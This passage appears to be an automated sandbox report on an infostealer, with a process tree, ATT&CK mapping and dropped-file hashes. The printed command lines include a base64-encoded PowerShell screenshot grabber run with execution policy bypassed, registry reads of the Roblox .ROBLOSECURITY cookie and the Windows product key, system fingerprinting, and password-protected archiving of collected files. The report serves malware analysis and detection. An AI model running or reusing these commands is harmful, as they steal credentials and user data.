gACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:2776
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4492
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qx21h5j0\qx21h5j0.cmdline"
        5⤵
        
        PID:2200
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9105.tmp" "c:\Users\Admin\AppData\Local\Temp\qx21h5j0\CSC62D94C5E20084AA4A64F2B38AA639CFF.TMP"
        6⤵
        
        PID:3692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:856
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:2600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2228
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4960
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:2008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2124
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4576
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2192
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4204
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1352
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1084
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3540
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:4540
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:2732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI23522\rar.exe a -r -hp"linus12" "C:\Users\Admin\AppData\Local\Temp\0i7Dg.zip" *"
    3⤵
    PID:4304
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2192
  - - C:\Users\Admin\AppData\Local\Temp\_MEI23522\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI23522\rar.exe a -r -hp"linus12" "C:\Users\Admin\AppData\Local\Temp\0i7Dg.zip" *
      4⤵
      Executes dropped EXE
      PID:4360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:2760
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2604
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:4680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:4804
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:1556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:3068
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:4324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:1348
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:5028
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:3444
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3704

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:4408
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:4524
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1984 -parentBuildID 20240401114208 -prefsHandle 1912 -prefMapHandle 1876 -prefsLen 25755 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {09e13d50-9706-4c72-8977-75b9cc7de0f8} 4524 "\\.\pipe\gecko-crash-server-pipe.4524" gpu
    3⤵
    PID:4476
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2396 -parentBuildID 20240401114208 -prefsHandle 2388 -prefMapHandle 2384 -prefsLen 25791 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {02b33e24-00d6-4a40-8304-8cc25bb520b2} 4524 "\\.\pipe\gecko-crash-server-pipe.4524" socket
    3⤵
    PID:2732
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3060 -childID 1 -isForBrowser -prefsHandle 3020 -prefMapHandle 2832 -prefsLen 25932 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {15f2c645-2cb2-490e-8ca6-40ce95467265} 4524 "\\.\pipe\gecko-crash-server-pipe.4524" tab
    3⤵
    PID:1704
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3740 -childID 2 -isForBrowser -prefsHandle 3548 -prefMapHandle 3692 -prefsLen 31165 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {47cf482b-88f3-4ade-ba5e-7595c29568c1} 4524 "\\.\pipe\gecko-crash-server-pipe.4524" tab
    3⤵
    PID:3912
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4740 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4680 -prefMapHandle 4808 -prefsLen 31165 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c08e5759-f711-41b1-8093-0d9569e7d193} 4524 "\\.\pipe\gecko-crash-server-pipe.4524" utility
    3⤵
    - Checks processor information in registry
    PID:2236
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5272 -childID 3 -isForBrowser -prefsHandle 5292 -prefMapHandle 5304 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b6aca731-1946-4e04-b526-8ebbdd1ce051} 4524 "\\.\pipe\gecko-crash-server-pipe.4524" tab
    3⤵
    PID:2616
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5416 -childID 4 -isForBrowser -prefsHandle 5460 -prefMapHandle 5468 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {004bc5a9-4e44-4398-8dba-ace814651169} 4524 "\\.\pipe\gecko-crash-server-pipe.4524" tab
    3⤵
    PID:2448
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5712 -childID 5 -isForBrowser -prefsHandle 5632 -prefMapHandle 5636 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8e2431a1-2418-410a-a521-63258ddff845} 4524 "\\.\pipe\gecko-crash-server-pipe.4524" tab
    3⤵
    PID:1148
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5492 -childID 6 -isForBrowser -prefsHandle 5480 -prefMapHandle 5484 -prefsLen 31090 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b2eaff54-c024-4992-9377-90771525bf2b} 4524 "\\.\pipe\gecko-crash-server-pipe.4524" tab
    3⤵
    PID:452

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
7a07cb40096daf505bfda8ec72004396

SHA1
d0f606a65b8ac4b7a98830cf45b19b8b06be483f

SHA256
86323c8668cc7b49ec37d615d6091e5f17df10b93c45d96f67c3bb3db73cb358

SHA512
2a90ee22b408a7b24e7411f27265d52bee75abe59050b6310a5ad243071e1ad670f91172f8c8c96e85474f3ca996c72d39a7c4242755bd1d626dcae9421f4e00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b7a092288251e4344f07be2dc4a0607c

SHA1
69418d0fe357b7bf74285d9a126193e67684b98c

SHA256
2f44e0c3697632e443397fd7ab8e35aeb8005a8118b465ab09935ebacd85325b

SHA512
0dc56ca423a8810922b36f4ae2ecb70254fc34a8da64873253b2318c41af98d7825adbad57b3fd2c9da87c11dfcc7dc0866f620ea996400045f672386b27944b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ehv06adt.default-release\activity-stream.discovery_stream.json.tmp

Filesize
21KB

MD5
2f8dd4ea0e47525568ba3f0fced6454f

SHA1
5cad04ad1d99a52b5f546727499ec12e4ecb84a0

SHA256
6029715d8d704b787d6a573235d28bd9a6b2999b6c612aa33fe2440a3041518b

SHA512
ffabe726cae5448cc8d65a52a8401b7a3666f91fcd348aef08034769273186d11a50828f0ffae08aa2382cc3805b970a71c0352314f94e02509a50ec7e166ba4

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ehv06adt.default-release\cache2\entries\5CD1EBDF6B57F13C7E783CE5E6D8E9C44014FE1A

Filesize
13KB

MD5
9c9963bc9019b91720cbfe8b7bbd673a

SHA1
1d6e90372d7e24ce917bcde58de698c0c306d721

SHA256
0f4baab99aab687276076b95fb13e6f4cc69aceeb0206c8ce38702d9872b6b5a

SHA512
708bb13c992cf711a3eda3bc534f964c2b2ffd40a09b5c99b041a58a1f1b96a98ff28f18583b46e8a28f38ddba9ac84fde6df5c209c32f298023c2a058393efd

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9105.tmp

Filesize
1KB

MD5
3e282f30975c265d970fbf33772ac5c2

SHA1
4ebd01a0457bc00b2a3aa74034b00c18398613ad

SHA256
bdad1c6755a183d6abc5e32b08e95523abe0f645d39d12e4853b73addd871aac

SHA512
5781aae328ac7f6f143c3bbf2c1ac6cee8d9b0d4146523536c5abd09916f9150fcf3ad1c5ff9ba59f4cc56daf75a938243ee1a3d427edbaae6639f261e5ed33c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23522\VCRUNTIME140.dll

Filesize
106KB

MD5
4585a96cc4eef6aafd5e27ea09147dc6

SHA1
489cfff1b19abbec98fda26ac8958005e88dd0cb

SHA256
a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736

SHA512
d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23522\_bz2.pyd

Filesize
48KB

MD5
554b7b0d0daca993e22b7d31ed498bc2

SHA1
ea7f1823e782d08a99b437c665d86fa734fe3fe4

SHA256
1db14a217c5279c106b9d55f440ccf19f35ef3a580188353b734e3e39099b13f

SHA512
4b36097eddd2c1d69ac98c7e98eebe7bb11a5117249ad36a99883732f643e21ecf58e6bea33b70974d600563dc0b0a30bead98bafb72537f8374b3d67979e60a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23522\_ctypes.pyd

Filesize
58KB

MD5
d603c8bfe4cfc71fe5134d64be2e929b

SHA1
ff27ea58f4f5b11b7eaa1c8884eac658e2e9248b

SHA256
5ee40bcaab13fa9cf064ecae6fc0da6d236120c06fa41602893f1010efaa52fe

SHA512
fcc0dbfbe402300ae47e1cb2469d1f733a910d573328fe7990d69625e933988ecc21ab22f432945a78995129885f4a9392e1cee224d14e940338046f61abe361

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23522\_decimal.pyd

Filesize
106KB

MD5
9cef71be6a40bc2387c383c217d158c7

SHA1
dd6bc79d69fc26e003d23b4e683e3fac21bc29cb

SHA256
677d9993bb887fef60f6657de6c239086ace7725c68853e7636e2ff4a8f0d009

SHA512
90e02054163d44d12c603debdc4213c5a862f609617d78dd29f7fd21a0bae82add4ceaf30024da681c2a65d08a8142c83eb81d8294f1284edfbeeb7d66c371c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23522\_hashlib.pyd

Filesize
35KB

MD5
32df18692606ce984614c7efda2eec27

SHA1
86084e39ab0aadf0ecfb82ce066b7bf14152961e

SHA256
b7c9c540d54ab59c16936e1639c6565cd35a8ca625f31753e57db9cbd0ee0065

SHA512
679f8956370edc4dee32475d8440a2d2f9b6dd0edd0e033e49fed7834a35c7ed51ccde0995d19ed0a559a4383b99ae8c11e4e686902db12a2a5e0a3f2c0f4a9d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23522\_lzma.pyd

Filesize
85KB

MD5
01629284f906c40f480e80104158f31a

SHA1
6ab85c66956856710f32aed6cdae64a60aea5f0f

SHA256
a201ec286b0233644ae62c6e418588243a3f2a0c5a6f556e0d68b3c747020812

SHA512
107a4e857dd78dd92be32911e3a574f861f3425e01ab4b1a7580ac799dc76122ce3165465d24c34ac7fc8f2810547ad72b4d4ba3de76d3d61ed9bf5b92e7f7d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23522\_queue.pyd

Filesize
25KB

MD5
4a313dc23f9d0a1f328c74dd5cf3b9ab

SHA1
494f1f5ead41d41d324c82721ab7ca1d1b72c062

SHA256
2163010bfde88a6cc15380516d31955935e243b7ad43558a89380bf5fe86337e

SHA512
42c712b758b35c0005b3528af586233298c2df4ed9f5133b8469bca9ec421ab151ce63f3929898c73d616cd9707594fa5f96d623fc150e214a4b2276c23c296e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23522\_socket.pyd

Filesize
43KB

MD5
67897f8c3262aecb8c9f15292dd1e1f0

SHA1
